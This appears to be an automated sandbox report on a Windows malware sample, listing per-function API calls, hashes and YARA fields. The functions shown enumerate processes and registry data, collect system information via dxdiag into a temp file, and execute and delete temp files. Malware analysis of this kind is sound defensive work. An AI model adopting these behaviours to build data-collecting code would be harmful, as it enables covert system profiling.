                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                                                                  • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,?,?,00411AD6), ref: 00412E5A
                                                                                  • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00411AD6), ref: 00412E64
                                                                                  • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$?size@?$basic_string@CreateD@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSaveStreammalloc
                                                                                • String ID: dat$image/png$png
                                                                                • API String ID: 1465418526-186023265
                                                                                • Opcode ID: 7bb990d58628e3a28b85cd86f421cfa4cbeba9bc6ff5b0cd4daa95a6987296ea
                                                                                • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                                                                • Opcode Fuzzy Hash: 7bb990d58628e3a28b85cd86f421cfa4cbeba9bc6ff5b0cd4daa95a6987296ea
                                                                                • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409EAA, Relevance: 48.2, APIs: 32, Instructions: 162processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                                                                  • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                                                                  • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                  • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,000197E8), ref: 00412B5E
                                                                                  • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                                                                • String ID:
                                                                                • API String ID: 819894693-0
                                                                                • Opcode ID: 5ceb64c33a25fdc5815c71a6d414f293c6035e853cd266936d296e1fa0de53de
                                                                                • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                                                                • Opcode Fuzzy Hash: 5ceb64c33a25fdc5815c71a6d414f293c6035e853cd266936d296e1fa0de53de
                                                                                • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BB20, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 191registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                                                                • RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                                                                • RegEnumValueW.ADVAPI32 ref: 0040BC67
                                                                                • _itoa.MSVCRT ref: 0040BC7E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?,?,0040BE7D,0040C731), ref: 0040BC96
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000,?,0040BE7D,0040C731), ref: 0040BCA8
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCB6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCBF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCCB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415770,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCE0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCEF
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCFD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD06
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD12
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD27
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD42
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD50
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD5E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD6A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD76
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$D@1@@V10@@$D@2@@0@EnumG@1@@G@2@@0@$InfoQueryV10@0@Value_itoa
                                                                                • String ID: [regsplt]
                                                                                • API String ID: 2158026845-4262303796
                                                                                • Opcode ID: 049dabd025bde2f4b6e2c70b7fde98284d8e67a683d246eaa9034b12ebeed36f
                                                                                • Instruction ID: 89d9bd96600c6e247975aaf8b0d3d97a5ae7f77b1b3f2a4fe7097baafbd20519
                                                                                • Opcode Fuzzy Hash: 049dabd025bde2f4b6e2c70b7fde98284d8e67a683d246eaa9034b12ebeed36f
                                                                                • Instruction Fuzzy Hash: C971977290021EEBDB11DBD0DD89DEEBB7DEF48345F004166E606A2150EB745A89CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EFB5, Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 120filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                                                                • getenv.MSVCRT ref: 0040EFDC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                                                                • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                                                                • ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                                                                • CloseHandle.KERNEL32(?), ref: 0040F0D2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F116
                                                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040F12E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F137
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F140
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F149
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                                                                • String ID: <$@$Temp
                                                                                • API String ID: 2271834883-1032778388
                                                                                • Opcode ID: cb6fefabf1ec3bccb2c3b11d9f250ac462e1d498c0f409a9ba22c47d5ba8a27d
                                                                                • Instruction ID: 888aea03b1af4e5dcc25ad03cf8797eeef26072084273f227dd45585e2e759a8
                                                                                • Opcode Fuzzy Hash: cb6fefabf1ec3bccb2c3b11d9f250ac462e1d498c0f409a9ba22c47d5ba8a27d
                                                                                • Instruction Fuzzy Hash: E541407190061DEBDB10EFE0DC4AAEE7B79EF44701F10403AF502A6190DBB45A89CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E927, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 121sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wgetenv.MSVCRT ref: 0040E93E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                • API String ID: 1966616101-2001430897
                                                                                • Opcode ID: 0c8f4e8c70904f7bdee29dd924357dab0b938e99ad2a055fbd56a69606e32820
                                                                                • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                                                                • Opcode Fuzzy Hash: 0c8f4e8c70904f7bdee29dd924357dab0b938e99ad2a055fbd56a69606e32820
                                                                                • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A370, Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                                                                • SetEvent.KERNEL32(?), ref: 0040A38C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
